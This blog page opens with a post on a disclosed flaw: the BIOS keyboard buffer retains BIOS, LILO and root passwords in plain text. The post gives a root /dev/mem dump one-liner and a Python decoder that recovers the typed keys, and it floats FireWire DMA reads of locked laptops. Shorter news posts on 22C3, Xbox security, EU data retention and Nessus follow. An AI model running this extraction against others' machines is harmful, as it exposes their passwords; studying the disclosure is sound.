How to dump your BIOS/LILO/root password as plain text [Update]

This is old news by now, but still interesting IMHO. Jonathan Brossard has posted an article on BugTraq which gives a pretty good introduction to the inner workings of the BIOS (with lots of links to more detailed resources) as well as known vulnerabilities of the BIOS password mechanism.

The most interesting part is his observation that the BIOS does not clear its own keyboard buffer before it hands control over to the boot loader and the operating system. Current OSes (Linux, Windows, *BSD, etc.) don't clear that buffer either.

This may not sound dangerous, but the buffer lives in the BIOS Data Area at a fixed physical address: 32 bytes starting at 0x041e (segment 0x40, offset 0x1e), room for the last 16 keystrokes that went through the BIOS keyboard services. Anyone who can read that part of your RAM can see those keystrokes, and they include the BIOS password you type in when booting your machine (if you set/use a BIOS password, of course).

This one-liner (executed as root) should let you view your password as plain text:

dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

(The dump starts at 0x400, so the buffer sits at offset 0x1e of it. Each buffer entry is two bytes, the ASCII code of the key followed by its keyboard scan code, which is why only every second byte belongs to the password. The buffer is a ring, so the password does not necessarily start at the beginning of it: the word at 0x41c, the tail pointer, marks the slot just after the most recently typed key.)
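As an added example (not code from the post or from Brossard's article), here is a decoder that turns the raw BIOS Data Area into the keystrokes in the order they were typed, walking the ring from the tail pointer instead of from the start of the buffer. The offsets it uses (head 0x41a, tail 0x41c, buffer 0x41e, buffer bounds 0x480/0x482) are the standard BIOS Data Area layout; the scan-code table assumes a US keyboard layout, and the keystroke simulator and the "hunter2" sample are constructed so the script can be run and checked without root or a legacy BIOS. Run it as root on a BIOS-booted Linux box and it reads /dev/mem instead.

```python
#!/usr/bin/env python3
"""Decode the BIOS keyboard ring buffer from the BIOS Data Area (BDA).

Added example, not part of the original post.  Physical layout used:
  0x41A  word   head: offset (relative to segment 0x40) of next entry to read
  0x41C  word   tail: offset of next free slot
  0x41E  32 B   default ring buffer, 16 entries of (ASCII byte, scan code byte)
  0x480  word   buffer start offset (default 0x1E)
  0x482  word   buffer end offset   (default 0x3E, one past the last entry)
"""
import sys

BDA_BASE = 0x400
OFF_HEAD, OFF_TAIL = 0x1A, 0x1C
OFF_BUF_START, OFF_BUF_END = 0x80, 0x82
DEFAULT_START, DEFAULT_END = 0x1E, 0x3E

# Set-1 make codes for the keys the simulator needs (assumption: US layout;
# a real BIOS stores whatever its INT 9 handler produced).
SCANCODES = {'\r': 0x1C}
for base, keys in ((0x02, "1234567890"), (0x10, "qwertyuiop"),
                   (0x1E, "asdfghjkl"), (0x2C, "zxcvbnm")):
    for i, k in enumerate(keys):
        SCANCODES[k] = base + i

_ESCAPES = {0x0D: "\\r", 0x0A: "\\n", 0x08: "\\b", 0x09: "\\t", 0x1B: "\\e"}


def _word(b, off):
    return b[off] | (b[off + 1] << 8)


def decode_kbd_buffer(bda):
    """bda: at least 0x100 bytes copied from physical address 0x400.
    Returns [(ascii_byte, scancode), ...] in the order the keys were typed.
    Stale entries survive because neither BIOS nor OS wipes the ring; the
    oldest surviving entry is the one at 'tail', so the walk starts there."""
    start, end = _word(bda, OFF_BUF_START), _word(bda, OFF_BUF_END)
    if not (DEFAULT_START <= start < end <= 0x100) or (end - start) % 2:
        start, end = DEFAULT_START, DEFAULT_END   # garbage pointers: assume defaults
    size = end - start
    tail = _word(bda, OFF_TAIL)
    if not (start <= tail < end) or (tail - start) % 2:
        tail = start                               # garbage tail: start at slot 0
    entries = []
    for i in range(size // 2):
        off = start + (tail - start + 2 * i) % size
        ascii_byte, scancode = bda[off], bda[off + 1]
        if ascii_byte or scancode:                 # skip slots never written
            entries.append((ascii_byte, scancode))
    return entries


def buffer_text(entries):
    """Render the ASCII bytes, i.e. every second byte of the hexdump."""
    return "".join(_ESCAPES.get(a, chr(a) if 0x20 <= a < 0x7F else "\\x%02x" % a)
                   for a, _ in entries)


def simulate_bios_typing(keys, start=DEFAULT_START, end=DEFAULT_END):
    """Constructed sample: emulate INT 9 storing keystrokes and INT 16h
    consuming them (head == tail afterwards) without ever clearing a slot."""
    bda = bytearray(0x100)
    bda[OFF_BUF_START:OFF_BUF_START + 2] = start.to_bytes(2, "little")
    bda[OFF_BUF_END:OFF_BUF_END + 2] = end.to_bytes(2, "little")
    tail = start
    for k in keys:
        bda[tail], bda[tail + 1] = ord(k), SCANCODES[k]
        tail = start + (tail + 2 - start) % (end - start)   # ring wrap
    bda[OFF_HEAD:OFF_HEAD + 2] = tail.to_bytes(2, "little")  # all consumed
    bda[OFF_TAIL:OFF_TAIL + 2] = tail.to_bytes(2, "little")
    return bytes(bda)


def read_bda(path="/dev/mem"):
    """Read the real BDA (needs root and a legacy-BIOS or CSM boot)."""
    with open(path, "rb") as f:
        f.seek(BDA_BASE)
        return f.read(0x100)


if __name__ == "__main__":
    try:
        bda = read_bda()
    except OSError as e:
        print("cannot read /dev/mem (%s); using constructed sample" % e, file=sys.stderr)
        bda = simulate_bios_typing("hunter2\r")    # made-up password, not real data
    entries = decode_kbd_buffer(bda)
    for a, s in entries:
        print("ascii=0x%02x scan=0x%02x" % (a, s))
    print("typed:", buffer_text(entries))
```

The simulator also shows the ring behaviour that the hexdump hides: type more than 16 keys and the oldest ones are overwritten, so with a 20-key sequence only the last 16 survive, and they begin at the tail pointer rather than at 0x41e.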

I also noticed that this same buffer also contains your LILO password, too! The same is probably true for passwords of other boot loaders such as GRUB, but I didn't test that.

Yes, reading this part of RAM usually requires root privileges on Unix-like OSes, but since the problem is OS-independent, other OSes (e.g. DOS, or older Windows versions) might be directly affected. Two caveats for current Linux systems: a kernel built with CONFIG_STRICT_DEVMEM normally still lets root read the first page of physical memory, where the BIOS Data Area lives, but a kernel running in lockdown mode refuses /dev/mem reads altogether, and a machine booted via UEFI without a CSM has no BIOS keyboard buffer to begin with.

But even on more secure OSes this plain-text storage of the BIOS/boot loader passwords might be a problem. Combine this with the DMA access that FireWire gives a connected device to physical memory, and attackers with physical access to your machine (e.g. your unattended laptop, while you are on the toilet) might be able to read your BIOS/LILO passwords even though you locked your machine. I haven't yet tried this, but I'm pretty sure it's possible. Please post the results here if you try this.

(via Stefan 'Sec' Zehl)

Update 2006-01-09: It seems that when you use software suspend (swsuspend2) the RAM area can/will also contain your root password! Thanks nelson for reporting.

22C3: Final Stuff

More Bandwidth

OK, I will make this short because a gazillion other people will probably blog about the 22C3 for several days or weeks to come... Today (last day) I only attended one talk, Bluetooth Hacking - The State of The Art. Funny stuff you can do with Bluetooth...

All in all it was a great conference. Get the proceedings or browse the list of talks (most of them have PDFs attached) for more details. Videos of all talks should be available anytime soon (I hope!).

Oh, and the 22C3 is probably the only event where you will see such signs (attached to walls by the congress staff!)...

17 Mistakes Microsoft Made in the Xbox Security System

Nice. Very nice. The Xbox-Linux / Free60 team around Michael Steil has published a paper / wiki page called 17 Mistakes Microsoft Made in the Xbox Security System. I'm currently reading the paper, but I'm not quite through yet (the PDF is 13 pages long). It contains a very detailed analysis of the 17 types of mistakes Microsoft made (they made most of them multiple times)...

The paper and the findings will be presented at the 22C3 in Berlin. This is one of the lectures I will definitely be attending, that's for sure!

Quoting from the article:

"[Conclusion:] The security system of the Xbox has been a complete failure."

Also nice: the earlier (now obsolete) version of the paper was called The Hidden Boot Code of the Xbox — or "How to fit three bugs in 512 bytes of security code" ;-)

(via Golem)

EU adopts Big Brother data retention directive, ignores industry and civil society [Update]

Heise (and many other sources) report that the EU parliament has voted for the abysmal data retention directive, simply ignoring objections from the industry and the civil society.

The EU has turned into a police state where more than 450 million citizens are treated as criminals by default now! 1984 is a joke compared to this. We're all fucked! Bigtime!

Please, someone go out and ~~sue the shit out of the fucking idiots who are responsible for this~~ kindly remind the responsible politicians that this directive is a really bad idea!

Update 2005-12-15: OK, so I might have overreacted. My first answer to the accusations would probably be (abusing an unrelated quote from Jonathan McDowell): "I exaggerate for effect". But honestly, while it's not as bad as 1984, I really do think that this law will bring us all a big step nearer to a 1984-type horror scenario.


Nessus 3.0 released as closed-source project [Update]

Nessus 3.0 (a popular security vulnerability scanner) has been released, and the license was changed from the GPL to a closed-source license. Goodbye Nessus, hello Porz-Wahn, hello OpenVAS, hello Sussen.

Update 2005-12-13: Added Sussen.

(via Golem)
